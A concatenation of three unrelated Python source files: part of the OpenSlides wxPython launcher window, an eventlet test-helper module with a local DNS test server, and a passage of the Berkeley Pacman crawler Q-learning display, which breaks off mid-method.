self.ch_interval_unit.AppendItems(choices)
self.ch_interval_unit.SetSelection(current)
def _update_backup_enabled(self):
checked = self.cb_backup.IsChecked()
self.fp_dest.Enable(checked)
self.sb_interval.Enable(checked)
self.ch_interval_unit.Enable(checked)
def on_backup_checked(self, evt):
self._update_backup_enabled()
def on_interval_changed(self, evt):
self._update_interval_choices()
# TODO: validate settings on close (e.g. non-empty path if backup is
# enabled)
class MainWindow(wx.Frame):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent, title="OpenSlides")
icons = wx.IconBundleFromFile(
get_data_path("openslides.ico"),
wx.BITMAP_TYPE_ICO)
self.SetIcons(icons)
self.server_running = False
self.gui_settings_path = None
self.gui_initialized = False
self.backupdb_enabled = False
self.backupdb_destination = ""
self.backupdb_interval = 15
self.backupdb_interval_unit = "minute"
self.last_backup = None
self.backup_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_backup_timer, self.backup_timer)
spacing = 5
panel = wx.Panel(self)
grid = wx.GridBagSizer(spacing, spacing)
# logo & about button
logo_box = wx.BoxSizer(wx.HORIZONTAL)
grid.Add(logo_box, pos=(0, 0), flag=wx.EXPAND)
row = 0
fp = get_data_path("openslides-logo_wide.png")
with open(fp, "rb") as f:
logo_wide_bmp = wx.ImageFromStream(f).ConvertToBitmap()
logo_wide = wx.StaticBitmap(panel, wx.ID_ANY, logo_wide_bmp)
logo_box.AddSpacer(2 * spacing)
logo_box.Add(logo_wide)
logo_box.AddStretchSpacer()
version_str = _("Version {0}").format(openslides.get_version())
lb_version = wx.StaticText(panel, label=version_str)
font = lb_version.GetFont()
font.SetPointSize(8)
lb_version.SetFont(font)
logo_box.Add(lb_version, flag=wx.ALIGN_CENTER_VERTICAL)
self.bt_about = wx.Button(panel, label=_("&About..."))
self.bt_about.Bind(wx.EVT_BUTTON, self.on_about_clicked)
grid.Add(self.bt_about, pos=(row, 1), flag=wx.ALIGN_CENTER_VERTICAL)
row += 1
grid.Add((0, spacing), pos=(row, 0), span=(1, 2))
row += 1
# server settings
server_settings = wx.StaticBox(panel, wx.ID_ANY, _("Server Settings"))
server_box = wx.StaticBoxSizer(server_settings, wx.VERTICAL)
grid.Add(server_box, pos=(row, 0), flag=wx.EXPAND)
self._host = None
self._port = None
hbox = wx.BoxSizer(wx.HORIZONTAL)
server_box.Add(hbox, flag=wx.EXPAND)
self.lb_host = wx.StaticText(panel)
hbox.Add(self.lb_host, flag=wx.ALIGN_CENTER_VERTICAL)
hbox.AddStretchSpacer()
self.lb_port = wx.StaticText(panel)
hbox.Add(self.lb_port, flag=wx.ALIGN_CENTER_VERTICAL)
hbox.AddStretchSpacer()
self.bt_settings = wx.Button(panel, label=_("S&ettings..."))
self.bt_settings.Bind(wx.EVT_BUTTON, self.on_settings_clicked)
hbox.Add(self.bt_settings)
server_box.AddSpacer(spacing)
self.cb_start_browser = wx.CheckBox(
panel, label=_("Automatically open &browser"))
self.cb_start_browser.SetValue(True)
server_box.Add(self.cb_start_browser)
server_box.AddStretchSpacer()
server_box.AddSpacer(spacing)
self.bt_server = wx.Button(panel, label=_("&Start server"))
self.bt_server.Bind(wx.EVT_BUTTON, self.on_start_server_clicked)
server_box.Add(self.bt_server, flag=wx.EXPAND)
self.host = "0.0.0.0"
self.port = unicode(get_port(self.host, 80))
# "action" buttons
action_vbox = wx.BoxSizer(wx.VERTICAL)
action_vbox.AddSpacer(3 * spacing)
grid.Add(action_vbox, pos=(row, 1))
self.bt_backup = wx.Button(panel, label=_("&Backup database..."))
self.bt_backup.Bind(wx.EVT_BUTTON, self.on_backup_clicked)
action_vbox.Add(self.bt_backup)
action_vbox.AddSpacer(spacing)
self.bt_sync_db = wx.Button(panel, label=_("S&ync database"))
self.bt_sync_db.Bind(wx.EVT_BUTTON, self.on_syncdb_clicked)
action_vbox.Add(self.bt_sync_db)
action_vbox.AddSpacer(spacing)
self.bt_reset_admin = wx.Button(panel, label=_("&Reset admin"))
self.bt_reset_admin.Bind(wx.EVT_BUTTON, self.on_reset_admin_clicked)
action_vbox.Add(self.bt_reset_admin)
row += 1
# command output
self.cmd_run_ctrl = RunCommandControl(panel)
self.cmd_run_ctrl.Bind(EVT_RUN_CMD, self.on_run_cmd_changed)
grid.Add(
self.cmd_run_ctrl,
pos=(row, 0), span=(1, 2),
flag=wx.EXPAND)
grid.AddGrowableCol(0)
grid.AddGrowableRow(3)
box = wx.BoxSizer(wx.VERTICAL)
box.Add(
grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
border=spacing, proportion=1)
panel.SetSizerAndFit(box)
self.Fit()
self.SetMinSize(self.ClientToWindowSize(box.GetMinSize()))
self.SetInitialSize(wx.Size(500, 400))
self.Bind(wx.EVT_CLOSE, self.on_close)
def initialize_gui(self):
if self.gui_initialized:
return True
# Set path for gui settings to default user data according to the
# OpenSlides type. This does not depend on any argument the user might
# type in.
openslides_type = detect_openslides_type()
try:
default_user_data_path = get_default_user_data_path(openslides_type)
except PortableDirNotWritable:
wx.MessageBox(
_("The portable directory is not writable. Please copy the "
"openslides portable to a writeable location and start it "
"again from there"),
_("Error: Portable directory not writable"),
wx.OK | wx.ICON_ERROR)
return False
self.gui_settings_path = os.path.join(
default_user_data_path, 'openslides', 'gui_settings.json')
self.load_gui_settings()
self.apply_backup_settings()
self.gui_initialized = True
return True
@property
def backup_interval_seconds(self):
if self.backupdb_interval_unit == "second":
factor = 1
elif self.backupdb_interval_unit == "minute":
factor = 60
elif self.backupdb_interval_unit == "hour":
factor = 3600
return self.backupdb_interval * factor
@property
def host(self):
return self._host
@host.setter
def host(self, host):
self._host = host
self.lb_host.SetLabel(_("Host: {0}").format(host))
@property
def port(self):
return self._port
@port.setter
def port(self, port):
self._port = port
self.lb_port.SetLabel(_("Port: {0}").format(port))
def load_gui_settings(self):
if self.gui_settings_path is None:
return
try:
f = open(self.gui_settings_path, "rb")
except IOError as e:
if e.errno == errno.ENOENT:
return
raise
with f:
settings = json.load(f)
def setattr_unless_none(attr, value):
if not value is None:
setattr(self, attr, value)
backup_settings = settings.get("database_backup", {})
setattr_unless_none("backupdb_enabled", backup_settings.get("enabled"))
setattr_unless_none(
"backupdb_destination", backup_settings.get("destination"))
setattr_unless_none(
"backupdb_interval", backup_settings.get("interval"))
setattr_unless_none(
"backupdb_interval_unit", backup_settings.get("interval_unit"))
last_backup = backup_settings.get("last_backup")
if not last_backup is None:
self.last_backup = datetime.datetime.strptime(
last_backup, "%Y-%m-%d %H:%M:%S")
server_settings = settings.get("server_settings", {})
setattr_unless_none("host", server_settings.get("host"))
setattr_unless_none("port", server_settings.get("port"))
def save_gui_settings(self):
if self.last_backup is None:
last_backup = None
else:
last_backup = self.last_backup.strftime("%Y-%m-%d %H:%M:%S")
settings = {
"database_backup": {
"enabled": self.backupdb_enabled,
"destination": self.backupdb_destination,
"internal": self.backupdb_interval,
"interval_unit": self.backupdb_interval_unit,
"last_backup": last_backup
},
"server_settings": {
"host": self.host,
"port": self.port,
},
}
dp = os.path.dirname(self.gui_settings_path)
if not os.path.exists(dp):
os.makedirs(dp)
with open(self.gui_settings_path, "wb") as f:
json.dump(settings, f, ensure_ascii=False, indent=4)
def apply_backup_settings(self):
if self.backupdb_enabled and self.server_running:
now = datetime.datetime.utcnow()
delta = datetime.timedelta(seconds=self.backup_interval_seconds)
ref = self.last_backup
if ref is None:
ref = now
ref += delta
d = ref - now
seconds = d.days * 86400 + d.seconds
if seconds < 1:
seconds = 30 # avoid backup immediatly after start
self.backup_timer.Start(seconds * 1000, True)
else:
self.backup_timer.Stop()
def do_backup(self):
cmd = [
sys.executable, "-u", "-m", "openslides", "backupdb",
self.backupdb_destination,
]
p = subprocess.Popen(
cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
p.stdin.close()
output = p.stdout.read().strip()
exitcode = p.wait()
if output:
self.cmd_run_ctrl.append_message(output)
time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if exitcode == 0:
self.cmd_run_ctrl.append_message(
_("{0}: Database backup successful.").format(time))
else:
self.cmd_run_ctrl.append_message(
_("{0}: Database backup failed!").format(time))
self.last_backup = datetime.datetime.utcnow()
def on_syncdb_clicked(self, evt):
self.cmd_run_ctrl.append_message(_("Syncing database..."))
self.cmd_run_ctrl.run_command("syncdb")
def on_reset_admin_clicked(self, evt):
self.cmd_run_ctrl.append_message(_("Resetting admin user..."))
self.cmd_run_ctrl.run_command("createsuperuser")
def on_about_clicked(self, evt):
info = wx.AboutDialogInfo()
info.SetName("OpenSlides")
info.SetVersion(openslides.get_version())
info.SetDescription(_(
"OpenSlides is a free web based presentation and "
"assembly system.\n"
"OpenSlides is free software; licensed under the MIT license."
).replace(u" ", u"\u00a0"))
info.SetCopyright(_(u"\u00a9 2011-2014 by OpenSlides team"))
info.SetWebSite(("http://www.openslides.org/", "www.openslides.org"))
# XXX: at least on wxgtk this has no effect
info.SetIcon(self.GetIcon())
wx.AboutBox(info)
def on_start_server_clicked(self, evt):
if self.server_running:
self.cmd_run_ctrl.cancel_command()
return
if self._host == "0.0.0.0":
args = ["--port", self._port]
else:
args = ["--address", self._host, "--port", self._port]
if not self.cb_start_browser.GetValue():
args.append("--no-browser")
self.server_running = True
self.cmd_run_ctrl.run_command("start", *args)
# initiate backup_timer if backup is enabled
self.apply_backup_settings()
self.bt_server.SetLabel(_("&Stop server"))
def on_settings_clicked(self, evt):
dlg = SettingsDialog(self)
dlg.host = self._host
dlg.port = self._port
if dlg.ShowModal() == wx.ID_OK:
self.host = dlg.host
self.port = dlg.port
def on_backup_clicked(self, evt):
dlg = BackupSettingsDialog(self)
dlg.backupdb_enabled = self.backupdb_enabled
dlg.backupdb_destination = self.backupdb_destination
dlg.interval = self.backupdb_interval
dlg.interval_unit = self.backupdb_interval_unit
if dlg.ShowModal() == wx.ID_OK:
self.backupdb_enabled = dlg.backupdb_enabled
self.backupdb_destination = dlg.backupdb_destination
self.backupdb_interval = dlg.interval
self.backupdb_interval_unit = dlg.interval_unit
self.apply_backup_settings()
def on_run_cmd_changed(self, evt):
show_completion_msg = not evt.running
if self.server_running and not evt.running:
self.bt_server.SetLabel(_("&Start server"))
self.server_running = False
self.backup_timer.Stop()
if self.backupdb_enabled:
self.do_backup()
# no operation completed msg when stopping server
show_completion_msg = False
self.bt_settings.Enable(not evt.running)
self.bt_backup.Enable(not evt.running)
self.bt_sync_db.Enable(not evt.running)
self.bt_reset_admin.Enable(not evt.running)
self.bt_server.Enable(self.server_running or not evt.running)
if show_completion_msg:
if evt.exitcode == 0:
text = _("Operation successfully completed.")
else:
text = _("Operation failed (exit code = {0})").format(
evt.exitcode)
self.cmd_run_ctrl.append_message(text)
def on_backup_timer(self, evt):
if not self.backupdb_enabled:
return
self.do_backup()
self.backup_timer.Start(1000 * self.backup_interval_seconds, True)
def on_close(self, ev):
self.cmd_run_ctrl.cancel_command()
self.save_gui_settings()
self.Destroy()
class OpenslidesApp(wx.App):
def __init__(self):
super(OpenslidesApp, self).__init__(False)
def OnInit(self):
window = MainWindow()
self.SetTopWindow(window)
if not window.initialize_gui():
self.Exit()
return False
window.Show()
return True
def main():
locale.setlocale(locale.LC_ALL, "")
lang = locale.getdefaultlocale()[0]
if lang:
global _translations
localedir = filesystem2unicode(openslides.__file__)
localedir = os.path.dirname(localedir)
localedir = os.path.join(localedir, "locale")
_translations = gettext.translation(
"django", localedir, [lang], fallback=True)
app = OpenslidesApp()
app.MainLoop()
if __name__ == "__main__":
main()
|
__init__.py | # package is named tests, not test, so it won't be confused with test in stdlib
from __future__ import print_function
import contextlib
import errno
import functools
import gc
import json
import os
try:
import resource
except ImportError:
resource = None
import signal
try:
import subprocess32 as subprocess # py2
except ImportError:
import subprocess # py3
import sys
import unittest
import warnings
from nose.plugins.skip import SkipTest
import eventlet
from eventlet import tpool
import six
import socket
from threading import Thread
import struct
# convenience for importers
main = unittest.main
@contextlib.contextmanager
def assert_raises(exc_type):
try:
yield
except exc_type:
pass
else:
name = str(exc_type)
try:
name = exc_type.__name__
except AttributeError:
pass
assert False, 'Expected exception {0}'.format(name)
def skipped(func, *decorator_args):
"""Decorator that marks a function as skipped.
"""
@functools.wraps(func)
def wrapped(*a, **k):
raise SkipTest(*decorator_args)
return wrapped
def skip_if(condition):
""" Decorator that skips a test if the *condition* evaluates True.
*condition* can be a boolean or a callable that accepts one argument.
The callable will be called with the function to be decorated, and
should return True to skip the test.
"""
def skipped_wrapper(func):
@functools.wraps(func)
def wrapped(*a, **kw):
if isinstance(condition, bool):
result = condition
else:
result = condition(func)
if result:
raise SkipTest()
else:
return func(*a, **kw)
return wrapped
return skipped_wrapper
def skip_unless(condition):
""" Decorator that skips a test if the *condition* does not return True.
*condition* can be a boolean or a callable that accepts one argument.
The callable will be called with the function to be decorated, and
should return True if the condition is satisfied.
"""
def skipped_wrapper(func):
@functools.wraps(func)
def wrapped(*a, **kw):
if isinstance(condition, bool):
result = condition
else:
result = condition(func)
if not result:
raise SkipTest()
else:
return func(*a, **kw)
return wrapped
return skipped_wrapper
def using_pyevent(_f):
from eventlet.hubs import get_hub
return 'pyevent' in type(get_hub()).__module__
def skip_with_pyevent(func):
""" Decorator that skips a test if we're using the pyevent hub."""
return skip_if(using_pyevent)(func)
def skip_on_windows(func):
""" Decorator that skips a test on Windows."""
return skip_if(sys.platform.startswith('win'))(func)
def skip_if_no_itimer(func):
""" Decorator that skips a test if the `itimer` module isn't found """
has_itimer = False
try:
import itimer
has_itimer = True
except ImportError:
pass
return skip_unless(has_itimer)(func)
def skip_if_CRLock_exist(func):
""" Decorator that skips a test if the `_thread.RLock` class exists """
try:
from _thread import RLock
return skipped(func)
except ImportError:
return func
def skip_if_no_ssl(func):
""" Decorator that skips a test if SSL is not available."""
try:
import eventlet.green.ssl
return func
except ImportError:
try:
import eventlet.green.OpenSSL
return func
except ImportError:
return skipped(func)
def skip_if_no_ipv6(func):
if os.environ.get('eventlet_test_ipv6') != '1':
return skipped(func)
return func
class TestIsTakingTooLong(Exception):
""" Custom exception class to be raised when a test's runtime exceeds a limit. """
pass
class LimitedTestCase(unittest.TestCase):
""" Unittest subclass that adds a timeout to all tests. Subclasses must
be sure to call the LimitedTestCase setUp and tearDown methods. The default
timeout is 1 second, change it by setting TEST_TIMEOUT to the desired
quantity."""
TEST_TIMEOUT = 1
def setUp(self):
self.previous_alarm = None
self.timer = eventlet.Timeout(self.TEST_TIMEOUT,
TestIsTakingTooLong(self.TEST_TIMEOUT))
def reset_timeout(self, new_timeout):
"""Changes the timeout duration; only has effect during one test.
`new_timeout` can be int or float.
"""
self.timer.cancel()
self.timer = eventlet.Timeout(new_timeout,
TestIsTakingTooLong(new_timeout))
def set_alarm(self, new_timeout):
"""Call this in the beginning of your test if you expect busy loops.
Only has effect during one test.
`new_timeout` must be int.
"""
def sig_alarm_handler(sig, frame):
# Could arm previous alarm but test is failed anyway
# seems to be no point in restoring previous state.
raise TestIsTakingTooLong(new_timeout)
self.previous_alarm = (
signal.signal(signal.SIGALRM, sig_alarm_handler),
signal.alarm(new_timeout),
)
def tearDown(self):
self.timer.cancel()
if self.previous_alarm:
signal.signal(signal.SIGALRM, self.previous_alarm[0])
signal.alarm(self.previous_alarm[1])
tpool.killall()
gc.collect()
eventlet.sleep(0)
verify_hub_empty()
def assert_less_than(self, a, b, msg=None):
msg = msg or "%s not less than %s" % (a, b)
assert a < b, msg
assertLessThan = assert_less_than
def assert_less_than_equal(self, a, b, msg=None):
msg = msg or "%s not less than or equal to %s" % (a, b)
assert a <= b, msg
assertLessThanEqual = assert_less_than_equal
def check_idle_cpu_usage(duration, allowed_part):
if resource is None:
# TODO: use https://code.google.com/p/psutil/
from nose.plugins.skip import SkipTest
raise SkipTest('CPU usage testing not supported (`import resource` failed)')
r1 = resource.getrusage(resource.RUSAGE_SELF)
eventlet.sleep(duration)
r2 = resource.getrusage(resource.RUSAGE_SELF)
utime = r2.ru_utime - r1.ru_utime
stime = r2.ru_stime - r1.ru_stime
# This check is reliably unreliable on Travis/Github Actions, presumably because of CPU
# resources being quite restricted by the build environment. The workaround
# is to apply an arbitrary factor that should be enough to make it work nicely.
if os.environ.get('CI') == 'true':
allowed_part *= 5
assert utime + stime < duration * allowed_part, \
"CPU usage over limit: user %.0f%% sys %.0f%% allowed %.0f%%" % (
utime / duration * 100, stime / duration * 100,
allowed_part * 100)
def verify_hub_empty():
def format_listener(listener):
return 'Listener %r for greenlet %r with run callback %r' % (
listener, listener.greenlet, getattr(listener.greenlet, 'run', None))
from eventlet import hubs
hub = hubs.get_hub()
readers = hub.get_readers()
writers = hub.get_writers()
num_readers = len(readers)
num_writers = len(writers)
num_timers = hub.get_timers_count()
assert num_readers == 0 and num_writers == 0, \
"Readers: %s (%d) Writers: %s (%d)" % (
', '.join(map(format_listener, readers)), num_readers,
', '.join(map(format_listener, writers)), num_writers,
)
def find_command(command):
for dir in os.getenv('PATH', '/usr/bin:/usr/sbin').split(os.pathsep):
p = os.path.join(dir, command)
if os.access(p, os.X_OK):
return p
raise IOError(errno.ENOENT, 'Command not found: %r' % command)
def silence_warnings(func):
def wrapper(*args, **kw):
warnings.simplefilter('ignore', DeprecationWarning)
try:
return func(*args, **kw)
finally:
warnings.simplefilter('default', DeprecationWarning)
wrapper.__name__ = func.__name__
return wrapper
def get_database_auth():
"""Retrieves a dict of connection parameters for connecting to test databases.
Authentication parameters are highly-machine specific, so
get_database_auth gets its information from either environment
variables or a config file. The environment variable is
"EVENTLET_DB_TEST_AUTH" and it should contain a json object. If
this environment variable is present, it's used and config files
are ignored. If it's not present, it looks in the local directory
(tests) and in the user's home directory for a file named
".test_dbauth", which contains a json map of parameters to the
connect function.
"""
retval = {
'MySQLdb': {'host': 'localhost', 'user': 'root', 'passwd': ''},
'psycopg2': {'user': 'test'},
}
if 'EVENTLET_DB_TEST_AUTH' in os.environ:
return json.loads(os.environ.get('EVENTLET_DB_TEST_AUTH'))
files = [os.path.join(os.path.dirname(__file__), '.test_dbauth'),
os.path.join(os.path.expanduser('~'), '.test_dbauth')]
for f in files:
try:
auth_utf8 = json.load(open(f))
# Have to convert unicode objects to str objects because
# mysqldb is dumb. Using a doubly-nested list comprehension
# because we know that the structure is a two-level dict.
return dict(
[(str(modname), dict(
[(str(k), str(v)) for k, v in connectargs.items()]))
for modname, connectargs in auth_utf8.items()])
except IOError:
pass
return retval
def run_python(path, env=None, args=None, timeout=None, pythonpath_extend=None, expect_pass=False):
new_argv = [sys.executable]
if sys.version_info[:2] <= (2, 7):
new_argv += ['-W', 'ignore:Python 2 is no longer supported']
new_env = os.environ.copy()
new_env.setdefault('eventlet_test_in_progress', 'yes')
src_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
if path:
path = os.path.abspath(path)
new_argv.append(path)
new_env['PYTHONPATH'] = os.pathsep.join(sys.path + [src_dir])
if env:
new_env.update(env)
if pythonpath_extend:
new_path = [p for p in new_env.get('PYTHONPATH', '').split(os.pathsep) if p]
new_path.extend(
p if os.path.isabs(p) else os.path.join(src_dir, p) for p in pythonpath_extend
)
new_env['PYTHONPATH'] = os.pathsep.join(new_path)
if args:
new_argv.extend(args)
p = subprocess.Popen(
new_argv,
env=new_env,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
)
if timeout is None:
timeout = 10
try:
output, _ = p.communicate(timeout=timeout)
except subprocess.TimeoutExpired:
p.kill()
output, _ = p.communicate(timeout=timeout)
if expect_pass:
sys.stderr.write('Program {0} output:\n---\n{1}\n---\n'.format(path, output.decode()))
assert False, 'timed out'
return '{0}\nFAIL - timed out'.format(output).encode()
if expect_pass:
if output.startswith(b'skip'):
parts = output.rstrip().split(b':', 1)
skip_args = []
if len(parts) > 1:
skip_args.append(parts[1])
raise SkipTest(*skip_args)
ok = output.rstrip() == b'pass'
if not ok:
sys.stderr.write('Program {0} output:\n---\n{1}\n---\n'.format(path, output.decode()))
assert ok, 'Expected single line "pass" in stdout'
return output
def run_isolated(path, prefix='tests/isolated/', **kwargs):
kwargs.setdefault('expect_pass', True)
run_python(prefix + path, **kwargs)
def check_is_timeout(obj):
value_text = getattr(obj, 'is_timeout', '(missing)')
assert obj.is_timeout, 'type={0} str={1} .is_timeout={2}'.format(type(obj), str(obj), value_text)
@contextlib.contextmanager
def capture_stderr():
stream = six.StringIO()
original = sys.stderr
try:
sys.stderr = stream
yield stream
finally:
sys.stderr = original
stream.seek(0)
certificate_file = os.path.join(os.path.dirname(__file__), 'test_server.crt')
private_key_file = os.path.join(os.path.dirname(__file__), 'test_server.key')
def test_run_python_timeout():
output = run_python('', args=('-c', 'import time; time.sleep(0.5)'), timeout=0.1)
assert output.endswith(b'FAIL - timed out')
def test_run_python_pythonpath_extend():
code = '''import os, sys ; print('\\n'.join(sys.path))'''
output = run_python('', args=('-c', code), pythonpath_extend=('dira', 'dirb'))
assert b'/dira\n' in output
assert b'/dirb\n' in output
@contextlib.contextmanager
def dns_tcp_server(ip_to_give, request_count=1):
state = [0] # request count storage writable by thread
host = "localhost"
death_pill = b"DEATH_PILL"
def extract_domain(data):
domain = b''
kind = (data[4] >> 3) & 15 # Opcode bits
if kind == 0: # Standard query
ini = 14
length = data[ini]
while length != 0:
domain += data[ini + 1:ini + length + 1] + b'.'
ini += length + 1
length = data[ini]
return domain
def answer(data, domain):
domain_length = len(domain)
packet = b''
if domain:
# If an ip was given we return it in the answer
if ip_to_give:
packet += data[2:4] + b'\x81\x80'
packet += data[6:8] + data[6:8] + b'\x00\x00\x00\x00' # Questions and answers counts
packet += data[14: 14 + domain_length + 1] # Original domain name question
packet += b'\x00\x01\x00\x01' # Type and class
packet += b'\xc0\x0c\x00\x01' # TTL
packet += b'\x00\x01'
packet += b'\x00\x00\x00\x08'
packet += b'\x00\x04' # Resource data length -> 4 bytes
packet += bytearray(int(x) for x in ip_to_give.split("."))
else:
packet += data[2:4] + b'\x85\x80'
packet += data[6:8] + b'\x00\x00' + b'\x00\x00\x00\x00' # Questions and answers counts
packet += data[14: 14 + domain_length + 1] # Original domain name question
packet += b'\x00\x01\x00\x01' # Type and class
sz = struct.pack('>H', len(packet))
return sz + packet
def serve(server_socket): # thread target
client_sock, address = server_socket.accept()
state[0] += 1
if state[0] <= request_count:
data = bytearray(client_sock.recv(1024))
if data == death_pill:
client_sock.close()
return
domain = extract_domain(data)
client_sock.sendall(answer(data, domain))
client_sock.close()
# Server starts
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((host, 0))
server_socket.listen(5)
server_addr = server_socket.getsockname()
thread = Thread(target=serve, args=(server_socket, ))
thread.start()
yield server_addr
# Stop the server
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(server_addr)
client.send(death_pill)
client.close()
thread.join()
server_socket.close()
|
graphicsCrawlerDisplay.py | # graphicsCrawlerDisplay.py
# -------------------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
# graphicsCrawlerDisplay.py
# -------------------------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and Pieter
# Abbeel in Spring 2013.
# For more info, see http://inst.eecs.berkeley.edu/~cs188/pacman/pacman.html
import tkinter
import qlearningAgents
import time
import threading
import sys
import crawler
# import pendulum
import math
from math import pi as PI
robotType = 'crawler'
class Application:
def sigmoid(self, x):
return 1.0 / (1.0 + 2.0 ** (-x))
def incrementSpeed(self, inc):
self.tickTime *= inc
# self.epsilon = min(1.0, self.epsilon)
# self.epsilon = max(0.0,self.epsilon)
# self.learner.setSpeed(self.epsilon)
self.speed_label['text'] = 'Step Delay: %.5f' % (self.tickTime)
def incrementEpsilon(self, inc):
self.ep += inc
self.epsilon = self.sigmoid(self.ep)
self.learner.setEpsilon(self.epsilon)
self.epsilon_label['text'] = 'Epsilon: %.3f' % (self.epsilon)
def incrementGamma(self, inc):
self.ga += inc
self.gamma = self.sigmoid(self.ga)
self.learner.setDiscount(self.gamma)
self.gamma_label['text'] = 'Discount: %.3f' % (self.gamma)
def incrementAlpha(self, inc):
self.al += inc
self.alpha = self.sigmoid(self.al)
self.learner.setLearningRate(self.alpha)
self.alpha_label['text'] = 'Learning Rate: %.3f' % (self.alpha)
def __initGUI(self, win):
## Window ##
self.win = win
## Initialize Frame ##
win.grid()
self.dec = -.5
self.inc = .5
self.tickTime = 0.1
## Epsilon Button + Label ##
self.setupSpeedButtonAndLabel(win)
self.setupEpsilonButtonAndLabel(win)
## Gamma Button + Label ##
self.setUpGammaButtonAndLabel(win)
## Alpha Button + Label ##
self.setupAlphaButtonAndLabel(win)
## Exit Button ##
# self.exit_button = tkinter.Button(win,text='Quit', command=self.exit)
#self.exit_button.grid(row=0, column=9)
## Simulation Buttons ##
# self.setupSimulationButtons(win)
## Canvas ##
self.canvas = tkinter.Canvas(root, height=200, width=1000)
self.canvas.grid(row=2, columnspan=10)
def setupAlphaButtonAndLabel(self, win):
self.alpha_minus = tkinter.Button(win,
text="-", command=(lambda: self.incrementAlpha(self.dec)))
self.alpha_minus.grid(row=1, column=3, padx=10)
self.alpha = self.sigmoid(self.al)
self.alpha_label = tkinter.Label(win, text='Learning Rate: %.3f' % (self.alpha))
self.alpha_label.grid(row=1, column=4)
self.alpha_plus = tkinter.Button(win,
text="+", command=(lambda: self.incrementAlpha(self.inc)))
self.alpha_plus.grid(row=1, column=5, padx=10)
def setUpGammaButtonAndLabel(self, win):
self.gamma_minus = tkinter.Button(win,
text="-", command=(lambda: self.incrementGamma(self.dec)))
self.gamma_minus.grid(row=1, column=0, padx=10)
self.gamma = self.sigmoid(self.ga)
self.gamma_label = tkinter.Label(win, text='Discount: %.3f' % (self.gamma))
self.gamma_label.grid(row=1, column=1)
self.gamma_plus = tkinter.Button(win,
text="+", command=(lambda: self.incrementGamma(self.inc)))
self.gamma_plus.grid(row=1, column=2, padx=10)
def setupEpsilonButtonAndLabel(self, win):
self.epsilon_minus = tkinter.Button(win,
text="-", command=(lambda: self.incrementEpsilon(self.dec)))
self.epsilon_minus.grid(row=0, column=3)
self.epsilon = self.sigmoid(self.ep)
self.epsilon_label = tkinter.Label(win, text='Epsilon: %.3f' % (self.epsilon))
self.epsilon_label.grid(row=0, column=4)
self.epsilon_plus = tkinter.Button(win,
text="+", command=(lambda: self.incrementEpsilon(self.inc)))
self.epsilon_plus.grid(row=0, column=5)
def setupSpeedButtonAndLabel(self, win):
self.speed_minus = tkinter.Button(win,
text="-", command=(lambda: self.incrementSpeed(.5)))
self.speed_minus.grid(row=0, column=0)
self.speed_label = tkinter.Label(win, text='Step Delay: %.5f' % (self.tickTime))
self.speed_label.grid(row=0, column=1)
self.speed_plus = tkinter.Button(win,
text="+", command=(lambda: self.incrementSpeed(2)))
self.speed_plus.grid(row=0, column=2)
def skip5kSteps(self):
self.stepsToSkip = 5000
def __init__(self, win):
self.ep = 0
self.ga = 2
self.al = 2
self.stepCount = 0
## Init Gui
self.__initGUI(win)
# Init environment
if robotType == 'crawler':
self.robot = crawler.CrawlingRobot(self.canvas)
self.robotEnvironment = crawler.CrawlingRobotEnvironment(self.robot)
elif robotType == 'pendulum':
self.robot = pendulum.PendulumRobot(self.canvas)
self.robotEnvironment = \
pendulum.PendulumRobotEnvironment(self.robot)
else:
raise Exception("Unknown RobotType")
# Init Agent
simulationFn = lambda agent: \
simulation.SimulationEnvironment(self.robotEnvironment, agent)
actionFn = lambda state: \
self.robotEnvironment.getPossibleActions(state)
self.learner = qlearningAgents.QLearningAgent(actionFn=actionFn)
self.learner.setEpsilon(self.epsilon)
self.learner.setLearningRate(self.alpha)
self.learner.setDiscount(self.gamma)
# Start GUI
self.running = True
self.stopped = False
self.stepsToSkip = 0
self.thread = threading.Thread(target=self.run)
self.thread.start()
def exit(self):
self.running = False
for i in range(5):
if not self.stopped:
time.sleep(0.1)
try:
self.win.destroy()
except:
pass
sys.exit(0)
def step(self):
self.stepCount += 1
state = self.robotEnvironment.getCurrentState()
actions = self.robotEnvironment.getPossibleActions(state)
if len(actions) == 0.0:
self.robotEnvironment.reset()
state = self.robotEnvironment.getCurrentState()
actions = self.robotEnvironment.getPossibleActions(state)
print('Reset!')
action = self.learner.getAction(state)
if action == None:
raise Exception('None action returned: Code Not Complete')
nextState, reward = self.robotEnvironment.doAction(action)
self.learner.observeTransition(state, action, nextState, reward)
def animatePolicy(self):
if robotType != 'pendulum':
raise Exception('Only pendulum can animatePolicy')
totWidth = self.canvas.winfo_reqwidth()
totHeight = self.canvas.winfo_reqheight()
length = 0.48 * min(totWidth, totHeight)
x, y = totWidth - length - 30, length +10
angleMin, angleMax = self.robot.getMinAndMaxAngle()
velMin, velMax = self.robot.getMinAndMaxAngleVelocity()
if not 'animatePolicyBox' in dir(self):
self.canvas.create_line(x, y, x + length, y)
self.canvas.create_line(x + length, y, x + length, y - length)
self.canvas.create_line(x + length, y - length, x, y - length)
self.canvas.create_line(x, y - length, x,y)
self.animatePolicyBox = 1
